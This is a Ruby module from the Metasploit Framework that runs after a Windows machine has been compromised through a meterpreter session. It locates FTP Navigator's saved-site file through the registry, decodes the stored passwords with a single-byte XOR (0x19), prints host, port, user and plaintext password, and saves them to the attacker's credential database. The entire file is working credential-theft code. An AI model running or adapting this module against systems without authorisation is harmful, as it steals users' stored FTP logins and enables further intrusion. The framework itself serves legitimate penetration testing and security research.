metasploit-framework/modules/post/windows/gather/credentials/ftpnavigator.rb

107 lines
2.6 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',
'Description' => %q{
This module extracts saved passwords from the FTP Navigator FTP client.
It will decode the saved passwords and store them in the database.
},
'License' => MSF_LICENSE,
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'Version' => "$Revision$",
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Navigator_is1\\"
val_name = "InstallLocation"
installdir = registry_getvaldata(key, val_name) || "c:\\FTP Navigator\\"
path = "#{installdir}Ftplist.txt"
begin
ftplist = client.fs.file.new(path,'r')
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to open Ftplist.txt: #{e}")
print_error("FTP Navigator May not Ne Installed")
return
end
lines = ftplist.read.split("\n")
lines.each do |line|
next if line.include? "Anonymous=1"
next unless line.include? ";Password="
dpass = ""
username = ""
server = ""
port = ""
line.split(";").each do |field|
next if field.include? "SavePassword"
if field.include? "Password="
epass = split_values(field)
dpass = decode_pass(epass)
elsif field.include? "User="
username = split_values(field)
elsif field.include? "Server="
server = split_values(field)
elsif field.include? "Port="
port = split_values(field)
end
end
print_good("Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}")
if session.db_record
source_id = session.db_record.id
else
source_id = nil
end
report_auth_info(
:host => server,
:port => port,
:sname => 'ftp',
:source_id => source_id,
:source_type => "exploit",
:user => username,
:pass => dpass
)
end
end
def split_values(field)
values = field.split("=",2)
return values[1]
end
def decode_pass(encoded)
decoded = ""
encoded.unpack("C*").each do |achar|
decoded << (achar ^ 0x19)
end
return decoded
end
end